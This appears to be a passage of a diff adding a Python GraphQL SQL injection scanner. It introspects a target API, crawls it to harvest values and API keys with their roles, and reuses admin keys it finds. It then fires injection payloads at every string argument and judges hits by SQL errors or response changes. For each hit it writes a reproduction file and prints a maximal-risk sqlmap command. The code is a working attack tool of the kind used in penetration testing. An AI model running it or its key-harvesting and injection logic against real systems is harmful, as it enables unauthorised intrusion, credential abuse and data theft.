query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + args = field.get("args") or [] + if args: + continue + qlist = seed_field_queries(field, types, page_sizes, max_items_per_list) + for q in qlist: + if requests_made >= max_requests: + break + if verbose: + print(Fore.BLUE + "[>] Seed query: " + truncate_str(q, 800)) + resp = post_graphql(endpoint, headers, {"query": q}, verbose=verbose) + requests_made += 1 + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + if isinstance(rdata, list): + for it in rdata[:max_items_per_list]: + if isinstance(it, dict): + key = it.get("key") or it.get("apiKey") or it.get("token") + role = it.get("role") + if key and role: + key_roles[key] = role + elif isinstance(rdata, dict): + key = rdata.get("key") or rdata.get("apiKey") or rdata.get("token") + role = rdata.get("role") + if key and role: + key_roles[key] = role + if delay and requests_made < max_requests: + time.sleep(delay) + + # decode base64/global IDs to numeric ids + added_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + added_decoded += 1 + if added_decoded: + print(Fore.GREEN + f"[+] Decoded {added_decoded} global/base64 id(s)") + + # follow-up BFS using id-like args + depth = 0 + while depth < max_depth and requests_made < max_requests: + progress = False + id_candidates: List[str] = [] + if "id" in extracted_values: + id_candidates.extend(list(extracted_values["id"])) + for k in list(extracted_values.keys()): + if k.lower().endswith("id") and k.lower() != "id": + id_candidates.extend(list(extracted_values[k])[:50]) + for k, vals in extracted_values.items(): + for v in list(vals)[:50]: + if try_decode_global_id(v): + id_candidates.append(v) + id_candidates = list(dict.fromkeys(id_candidates))[:500] + + for field in query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + args = field.get("args") or [] + if not args: + continue + id_arg_names = [a.get("name") for a in args if a.get("name") and 'id' in a.get("name").lower()] + if not id_arg_names: + continue + candidates_per_arg = [] + for an in id_arg_names: + vals = list(extracted_values.get(an, []))[:6] + if not vals: + vals = id_candidates[:6] + if not vals: + vals = ["1"] + candidates_per_arg.append(vals) + combos = [] + for prod in product(*candidates_per_arg): + args_dict = {id_arg_names[i]: prod[i] for i in range(len(id_arg_names))} + ahash = hashlib.sha1(json.dumps({"f": fname, "args": args_dict}, sort_keys=True).encode()).hexdigest() + if (fname, ahash) in visited: + continue + combos.append((args_dict, ahash)) + if len(combos) >= 6: + break + for args_dict, ahash in combos: + if requests_made >= max_requests: + break + visited.add((fname, ahash)) + return_type_name = extract_named_type(field.get("type")) + ret_def = find_type_definition(types, return_type_name) + sel = None + if ret_def and ret_def.get("fields"): + sel = pick_scalar_field_for_type(ret_def, types) or (ret_def.get("fields")[0].get("name")) + q = build_query(fname, args_dict, sel) + q_str = q.get("query") if isinstance(q, dict) else str(q) + if verbose: + print(Fore.BLUE + "[>] Follow query: " + truncate_str(q_str, 800)) + resp = post_graphql(endpoint, headers, {"query": q_str}, verbose=verbose) + requests_made += 1 + progress = True + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + if isinstance(rdata, list): + for it in rdata[:max_items_per_list]: + if isinstance(it, dict): + key = it.get("key") or it.get("apiKey") or it.get("token") + role = it.get("role") + if key and role: + key_roles[key] = role + elif isinstance(rdata, dict): + key = rdata.get("key") or rdata.get("apiKey") or rdata.get("token") + role = rdata.get("role") + if key and role: + key_roles[key] = role + if delay and requests_made < max_requests: + time.sleep(delay) + if not progress: + break + new_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + if idv not in extracted_values.get("id", set()): + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + new_decoded += 1 + if new_decoded: + print(Fore.GREEN + f"[+] Decoded {new_decoded} additional global/base64 id(s)") + depth += 1 + + total_vals = sum(len(v) for v in extracted_values.values()) + if total_vals: + print(Fore.GREEN + f"[+] Crawled and extracted {total_vals} values from {len(extracted_values)} distinct keys (requests made: {requests_made})") + if key_roles: + print(Fore.GREEN + f"[+] Found {len(key_roles)} key->role mappings during crawl") + _pretty_print_extracted_values(extracted_values, key_roles) + return extracted_values, key_roles + +# -------------------- Grouping & printing (left-aligned compact) ----------- + +def group_findings_by_param(findings: List[Dict[str, Any]], endpoint: str) -> Dict[str, Any]: + grouped: Dict[str, Any] = {} + for f in findings: + param = f.get("arg") or "unknown" + field = f.get("field") or "" + args_context = dict(f.get("args_used") or {}) + args_context.pop(param, None) + payload = f.get("payload") + evidence_type = f.get("type") or "" + evidence_text = f.get("evidence") or "" + repro = f.get("repro") or "" + recommended_cmd = f.get("recommended_cmd") or (_build_sqlmap_cmd_marker(repro) if repro else "") + timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + confidence = compute_confidence(evidence_type, payload or "", bool(repro)) + occ_list = grouped.setdefault(param, {"occurrences": {}, "aggregate": {}}) + occ_key = f"{field} @ {endpoint}" + occ = occ_list["occurrences"].setdefault(occ_key, {"field": field, "endpoint": endpoint, "args_context": args_context, "findings": []}) + occ["findings"].append({ + "payload": payload, + "evidence_type": evidence_type, + "evidence": evidence_text, + "attack_response": truncate_str(str(f.get("attack_response")), 1000), + "base_response": truncate_str(str(f.get("base_response")), 1000), + "repro": repro, + "recommended_cmd": recommended_cmd, + "timestamp": timestamp, + "confidence": confidence, + "args_used": f.get("args_used") + }) + for param, data in list(grouped.items()): + occs = [] + all_payloads = set() + max_conf = 0.0 + for k, v in data["occurrences"].items(): + occs.append(v) + for fin in v.get("findings", []): + all_payloads.add(fin.get("payload")) + if fin.get("confidence", 0) > max_conf: + max_conf = fin.get("confidence", 0) + severity = "high" if max_conf >= 0.9 else "low" + data["occurrences"] = occs + data["aggregate"] = { + "unique_payloads": len(all_payloads), + "total_evidences": sum(len(o.get("findings", [])) for o in occs), + "max_confidence": max_conf, + "fields_affected": len(occs), + "severity": severity, + "notes": "" + } + return grouped + +def print_grouped_summary(grouped: Dict[str, Any]): + """ + Left-aligned compact printing: + - header: [n] (param in red; no occurrence line) + - Slight indentation for Payload / Evidence lines. + - Payload label in yellow, Evidence label in blue. + - Recommended sqlmap command label in magenta, printed with NO extra indentation. + """ + if not grouped: + return + + params = sorted(grouped.items(), key=lambda kv: (0 if kv[1].get("aggregate", {}).get("severity") == "high" else 1, kv[0])) + print(Fore.MAGENTA + "\n[*] Findings grouped by vulnerable parameter:\n") + + for idx, (param, data) in enumerate(params, start=1): + # header left aligned, param in red + print(f"[{idx}] {Fore.RED}{param}{Style.RESET_ALL}") + + for occ in data.get("occurrences", []): + # omit printing " @ (context args: ...)" + + for fin in occ.get("findings", []): + payload = fin.get("payload") + payload_display = payload if payload is not None else json.dumps(fin.get("args_used") or {}, ensure_ascii=False) + # slight indent for payload/evidence + print(" " + Fore.YELLOW + "Payload: " + Style.RESET_ALL + f"{payload_display}") + + evidence = fin.get("evidence") or "" + cleaned = re.sub(r"\s+", " ", evidence).strip() + cleaned = re.sub(r"\[SQL: .*", "[SQL TRACE]", cleaned, flags=re.S) + if len(cleaned) > EVIDENCE_MAX_CHARS: + cleaned = cleaned[:EVIDENCE_MAX_CHARS - 3].rstrip() + "..." + if re.search(r"\[SQL TRACE\]", evidence, flags=re.I) and "[SQL TRACE]" not in cleaned: + cleaned = cleaned + " [SQL TRACE]" + print(" " + Fore.BLUE + "Evidence: " + Style.RESET_ALL + cleaned) + print("") # blank line between findings + + # Recommended sqlmap command label in magenta, no indentation + first_repro = None + first_cmd = None + for fin in occ.get("findings", []): + if fin.get("repro"): + first_repro = fin.get("repro") + first_cmd = fin.get("recommended_cmd") or _build_sqlmap_cmd_marker(first_repro) + break + if first_repro: + print(Fore.MAGENTA + "Recommended sqlmap command:" + Style.RESET_ALL) + print(Fore.MAGENTA + f"{first_cmd}" + Style.RESET_ALL) + print("") # blank line between occurrences + +# -------------------- Detection flow (markers, checks) --------------------- + +def _canonical_marker_key(endpoint: str, field: str, arg: str, context_args: Dict[str, Any]) -> str: + parts = [endpoint, field, arg] + arg_names = sorted(list(context_args.keys())) if isinstance(context_args, dict) else [] + parts.append(",".join(arg_names)) + return "|".join(parts) + +def write_or_update_marker(endpoint: str, headers: Dict[str, str], attack_query: str, + field: str, arg: str, payload: str, + context_args: Dict[str, Any], + evidence_type: Optional[str], evidence_text: Optional[str]) -> str: + try: + escaped_payload = json.dumps(payload) + except Exception: + escaped_payload = payload + escaped_marker = json.dumps("*") + if escaped_payload in attack_query: + marker_query = attack_query.replace(escaped_payload, escaped_marker, 1) + elif payload in attack_query: + marker_query = attack_query.replace(payload, "*", 1) + else: + marker_query = attack_query.replace("\\" + payload, escaped_marker, 1) + + canonical = _canonical_marker_key(endpoint, field, arg, context_args or {}) + short_hash = hashlib.sha1(canonical.encode("utf-8")).hexdigest()[:8] + filename = f"{_sanitize_name(field)}_{_sanitize_name(arg)}_{short_hash}_marker.http" + + repro_dir = Path(REPRO_DIR) + repro_dir.mkdir(parents=True, exist_ok=True) + marker_path = repro_dir / filename + + if not marker_path.exists(): + body = {"query": marker_query} + _write_raw_http(endpoint, headers, body, filename) + + idx = _read_index() + entry = idx.get(filename) or { + "endpoint": endpoint, + "field": field, + "arg": arg, + "context_arg_names": sorted(list((context_args or {}).keys())), + "evidences": [] + } + + ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + repro_rel = str(marker_path) + recommended_cmd = f"sqlmap --level 5 --risk 3 -r '{repro_rel}' -p \"JSON[query]\" --batch --skip-urlencode --random-agent" + + evidence_record = { + "payload": payload, + "evidence_type": evidence_type or "", + "evidence": evidence_text or "", + "timestamp": ts, + "repro": repro_rel, + "recommended_cmd": recommended_cmd + } + + exists = any(e.get("payload") == payload and e.get("evidence") == evidence_text for e in entry.get("evidences", [])) + if not exists: + entry.setdefault("evidences", []).append(evidence_record) + idx[filename] = entry + _write_index(idx) + return str(marker_path) + +def _build_sqlmap_cmd_marker(repro_marker_path: str) -> str: + return f"sqlmap --level 5 --risk 3 -r '{repro_marker_path}' -p \"JSON[query]\" --batch --skip-urlencode --parse-errors --random-agent" + +def check_sql_error_in_response(resp_data: Dict[str, Any]) -> Optional[Dict[str, str]]: + if not resp_data: + return None + errors = resp_data.get("errors") + if not errors: + return None + for e in errors: + msg = str(e.get("message", "")) + for rx in SQL_ERROR_SIGS: + if rx.search(msg): + return {"evidence": msg, "pattern": rx.pattern} + return None + +def detect_missing_required_arg(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + errors = resp_data.get("errors") or [] + for e in errors: + msg = str(e.get("message", "")) + m = re.search(r'argument\s+"([^"]+)"[^.]*required but not provided', msg, re.I) + if m: + return m.group(1) + return None + +def detect_graphql_syntax_error(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + errors = resp_data.get("errors") or [] + for e in errors: + msg = str(e.get("message", "")) + if re.search(r"Syntax Error GraphQL|Syntax Error|Unexpected character|Expected :, found", msg, re.I): + return msg + return None + +def compute_confidence(evidence_type: str, payload: str, has_repro: bool) -> float: + weights = { + "SQL_ERROR": 0.6, + "SQL_ERROR_IN_RESPONSE": 0.6, + "SQL_ERROR_IN_RESPONSE_SIMPLE": 0.6, + "RESPONSE_DIFF": 0.2, + "RESPONSE_DIFF_SIMPLE": 0.1, + "NULL_ON_ATTACK": 0.15, + } + base = weights.get(evidence_type, 0.1) + payload_bonus = 0.0 + if payload and re.search(r"(\bOR\b|\bUNION\b|--|/\*|')", payload, re.I): + payload_bonus = 0.1 + repro_bonus = 0.15 if has_repro else 0.0 + score = base + payload_bonus + repro_bonus + if score > 0.99: + score = 0.99 + return round(score, 2) + +# -------------------- Main detection logic -------------------------------- + +def run_detector(endpoint: str, headers: Dict[str, str], crawl: bool = False, + crawl_depth: int = 2, max_requests: int = 250, max_items: int = 10, + crawl_delay: float = 0.0, verbose: bool = False) -> List[Dict[str, Any]]: + + print(Fore.CYAN + f"[*] Running introspection on {endpoint}") + intros = post_graphql(endpoint, headers, {"query": INTROSPECTION_QUERY}, verbose=verbose) + schema = None + try: + schema = intros["data"]["data"]["__schema"] + except Exception: + print(Fore.RED + "[!] Failed to retrieve schema via introspection. Response:") + print(json.dumps(intros.get("data", {}), ensure_ascii=False, indent=2)) + return [] + + types = schema.get("types", []) + query_type = next((t for t in types if t.get("name") == "Query"), None) + if not query_type or not query_type.get("fields"): + print(Fore.RED + "[!] Query type or fields not found in schema.") + return [] + + query_fields = query_type.get("fields", []) + + if crawl: + extracted_values, key_roles = crawl_and_extract_values( + endpoint, headers, query_fields, types, + max_depth=crawl_depth, max_requests=max_requests, + max_items_per_list=max_items, delay=crawl_delay, verbose=verbose) + else: + extracted_values, key_roles = crawl_and_extract_values( + endpoint, headers, query_fields, types, + max_depth=1, max_requests=50, max_items_per_list=max_items, delay=crawl_delay, verbose=verbose) + + admin_keys = [k for k, r in key_roles.items() if isinstance(r, str) and 'admin' in r.lower()] + if admin_keys: + print(Fore.GREEN + f"[+] Prioritizing {len(admin_keys)} admin key(s) when filling key-like arguments") + + temp_findings: Dict[Tuple[str, str], List[Dict[str, Any]]] = {} + + for field in query_fields: + args = field.get("args", []) or [] + if not args: + continue + field_name = field.get("name") + if not field_name or field_name.startswith("__"): + continue + + string_args = [] + for arg in args: + arg_type_name = extract_named_type(arg.get("type")) + if is_string_type(arg_type_name): + string_args.append(arg) + if not string_args: + continue + + return_type_name = extract_named_type(field.get("type")) + return_type_def = find_type_definition(types, return_type_name) + selection = pick_scalar_field_for_type(return_type_def, types) + if not selection and return_type_def and return_type_def.get("fields"): + fallback = next((f for f in return_type_def["fields"] if f["name"] in ("id", "uuid", "username", "name", "title", "__typename")), None) + if fallback: + selection = fallback["name"] + if not selection: + selection = "__typename" + + base_values: Dict[str, List[str]] = {} + for arg in args: + an = arg.get("name") + ev = list(extracted_values.get(an, []))[:8] + if an and any(k in an.lower() for k in ("key", "apikey", "token")) and admin_keys: + deduped = [] + for k in admin_keys: + if k not in deduped: + deduped.append(k) + for v in ev: + if v not in deduped: + deduped.append(v) + ev = deduped[:8] + if verbose: + print(Fore.YELLOW + f"[>] Using prioritized admin keys for argument '{an}': {ev[:3]}") + if not ev: + ev = simple_name_match_values(an, extracted_values) + if ev: + base_values[an] = ev + else: + arg_type_name = extract_named_type(arg.get("type")) + base_values[an] = ["test", "admin", "test123"] if is_string_type(arg_type_name) else ["1", "100"] + + for target_arg in string_args: + target_arg_name = target_arg.get("name") + + other_args = [a.get("name") for a in args if a.get("name") != target_arg_name] + candidate_lists = [] + for oname in other_args: + vals = base_values.get(oname, ["test"]) + candidate_lists.append(sorted(vals, key=lambda x: len(str(x)), reverse=True)[:3]) + + combos_to_try: List[Dict[str, str]] = [] + if candidate_lists: + max_attempts = 6 + seen = 0 + for combo in product(*candidate_lists): + args_dict = {} + for idx, oname in enumerate(other_args): + args_dict[oname] = combo[idx] + args_dict[target_arg_name] = "test" + combos_to_try.append(args_dict) + seen += 1 + if seen >= max_attempts: + break + else: + combos_to_try.append({target_arg_name: "test"}) + + working_args: Optional[Dict[str, str]] = None + base_resp = None + base_norm = None + base_has_error = True + for attempt_args in combos_to_try: + base_payload = build_query(field_name, attempt_args, selection) + base_q = base_payload.get("query") if isinstance(base_payload, dict) else str(base_payload) + base_resp = post_graphql(endpoint, headers, {"query": base_q}, verbose=verbose) + base_norm = normalize_resp(base_resp.get("data")) + base_has_error = bool(base_resp.get("data", {}).get("errors")) + if not base_has_error: + working_args = attempt_args.copy() + print(Fore.GREEN + Style.DIM + f"[+] Baseline for {field_name}.{target_arg_name} works with args: {attempt_args}") + break + + if not working_args: + working_args = combos_to_try[0].copy() if combos_to_try else {target_arg_name: "test"} + print(Fore.YELLOW + Style.DIM + f"[!] No clean baseline found for {field_name}.{target_arg_name}, using best-effort baseline: {working_args}") + + simple_q_base = build_query(field_name, {**working_args, target_arg_name: "test"}, "__typename") + simple_q_str = simple_q_base.get("query") if isinstance(simple_q_base, dict) else str(simple_q_base) + simple_base_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + simple_base_norm = normalize_resp(simple_base_resp.get("data")) + simple_field_value = get_field_from_response(simple_base_resp.get("data"), field_name) + + for payload in PAYLOADS: + attack_args = working_args.copy() + attack_args[target_arg_name] = payload + attack_payload = build_query(field_name, attack_args, selection) + attack_q_str = attack_payload.get("query") if isinstance(attack_payload, dict) else str(attack_payload) + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + + missing_arg = detect_missing_required_arg(attack_resp.get("data")) + if missing_arg: + candidate = None + if base_values.get(missing_arg): + candidate = base_values[missing_arg][0] + else: + matches = simple_name_match_values(missing_arg, extracted_values) + if matches: + candidate = matches[0] + if candidate: + attack_args[missing_arg] = candidate + attack_payload = build_query(field_name, attack_args, selection) + attack_q_str = attack_payload.get("query") if isinstance(attack_payload, dict) else str(attack_payload) + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + else: + continue + + sql_err = check_sql_error_in_response(attack_resp.get("data")) + attack_norm = normalize_resp(attack_resp.get("data")) + + key = (field_name, target_arg_name) + temp_findings.setdefault(key, []) + + if sql_err: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "SQL_ERROR", sql_err.get("evidence")) + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "SQL_ERROR", + "evidence": sql_err["evidence"], + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if base_norm and attack_norm and base_norm != attack_norm and not base_has_error: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF", "Baseline != Attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "RESPONSE_DIFF", + "evidence": "Baseline != Attack", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if base_norm and attack_norm and ("null" in attack_norm) and ("null" not in base_norm): + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "NULL_ON_ATTACK", "Null returned on attack while baseline had data") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "NULL_ON_ATTACK", + "evidence": "Null returned on attack while baseline had data", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if simple_field_value not in (None, {}, []) and simple_base_norm and attack_norm and simple_base_norm != attack_norm: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF_SIMPLE", "Simple baseline __typename differs from attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + # fallback simple checks + for payload in PAYLOADS: + simple_attack_q = build_query(field_name, {target_arg_name: payload}, "__typename") + simple_q_str = simple_attack_q.get("query") if isinstance(simple_attack_q, dict) else str(simple_attack_q) + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + + missing_arg = detect_missing_required_arg(simple_atk_resp.get("data")) + if missing_arg: + candidate = None + if base_values.get(missing_arg): + candidate = base_values[missing_arg][0] + else: + matches = simple_name_match_values(missing_arg, extracted_values) + if matches: + candidate = matches[0] + if candidate: + simple_attack_q = build_query(field_name, {target_arg_name: payload, missing_arg: candidate}, "__typename") + simple_q_str = simple_attack_q.get("query") if isinstance(simple_attack_q, dict) else str(simple_attack_q) + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + else: + continue + + if detect_graphql_syntax_error(simple_atk_resp.get("data")): + continue + + sa_norm = normalize_resp(simple_atk_resp.get("data")) + sa_err = check_sql_error_in_response(simple_atk_resp.get("data")) + + key = (field_name, target_arg_name) + temp_findings.setdefault(key, []) + + if sa_err: + marker_path = write_or_update_marker( + endpoint, headers, simple_q_str, field_name, target_arg_name, payload, {}, "SQL_ERROR", sa_err.get("evidence")) + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "SQL_ERROR_IN_RESPONSE_SIMPLE", + "evidence": sa_err["evidence"], + "base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + break + + if simple_field_value not in (None, {}, []) and simple_base_norm and sa_norm and simple_base_norm != sa_norm: + marker_path = write_or_update_marker( + endpoint, headers, simple_q_str, field_name, target_arg_name, payload, {}, "RESPONSE_DIFF_SIMPLE", "Simple baseline __typename differs from attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + break + + # finalize with confirmation rules + final_findings: List[Dict[str, Any]] = [] + for (field_name, arg_name), items in temp_findings.items(): + all_attack_null = True + for it in items: + atk = it.get("attack_response") + if isinstance(atk, dict): + val = None + try: + if isinstance(atk.get("data"), dict): + val = atk.get("data", {}).get(field_name) + else: + val = atk.get(field_name) + except Exception: + val = None + if val not in (None, {}, []): + all_attack_null = False + break + else: + all_attack_null = False + break + if all_attack_null and not any(i.get("type", "").startswith("SQL_ERROR") for i in items): + continue + + types_present = set(i.get("type") for i in items) + payloads_present = set(i.get("payload") for i in items) + has_sql_err = any(i.get("type", "").startswith("SQL_ERROR") for i in items) + has_null_on_attack = any(i.get("type") == "NULL_ON_ATTACK" for i in items) + + if has_sql_err: + for i in items: + if i.get("type", "").startswith("SQL_ERROR"): + final_findings.append(i) + continue + + if len(payloads_present) >= 2: + seen_payloads = set() + for i in items: + p = i.get("payload") + if p not in seen_payloads: + final_findings.append(i) + seen_payloads.add(p) + continue + + if has_null_on_attack: + for i in items: + if i.get("type") == "NULL_ON_ATTACK": + final_findings.append(i) + continue + + if "RESPONSE_DIFF" in types_present and "RESPONSE_DIFF_SIMPLE" in types_present: + rep = next((i for i in items if i.get("type") in ("RESPONSE_DIFF", "RESPONSE_DIFF_SIMPLE")), None) + if rep: + final_findings.append(rep) + continue + + return final_findings + +# -------------------- CLI / main ------------------------------------------ + +def main(): + parser = argparse.ArgumentParser(description="GraphQL SQLi mini-detector (compact grouped output)") + parser.add_argument("endpoint", help="GraphQL endpoint URL") + parser.add_argument("headers", nargs="?", help="Optional headers JSON", default=None) + parser.add_argument("--crawl", action="store_true", help="Enable limited crawling to extract outputs and reuse them as inputs (opt-in)") + parser.add_argument("--crawl-depth", type=int, default=2, help="Max crawl depth (default: 2)") + parser.add_argument("--max-requests", type=int, default=250, help="Maximum number of requests allowed during crawling (default: 250)") + parser.add_argument("--max-items", type=int, default=10, help="Max items per list to inspect when extracting values (default: 10)") + parser.add_argument("--crawl-delay", type=float, default=0.0, help="Delay in seconds between crawl requests (default: 0.0)") + parser.add_argument("--verbose", action="store_true", help="Print queries and debug information") + args = parser.parse_args() + + headers = try_parse_headers(args.headers) + findings = run_detector(args.endpoint, headers, crawl=args.crawl, crawl_depth=args.crawl_depth, + max_requests=args.max_requests, max_items=args.max_items, + crawl_delay=args.crawl_delay, verbose=args.verbose) + + grouped = group_findings_by_param(findings, args.endpoint) + print_grouped_summary(grouped) + +if __name__ == "__main__": + main()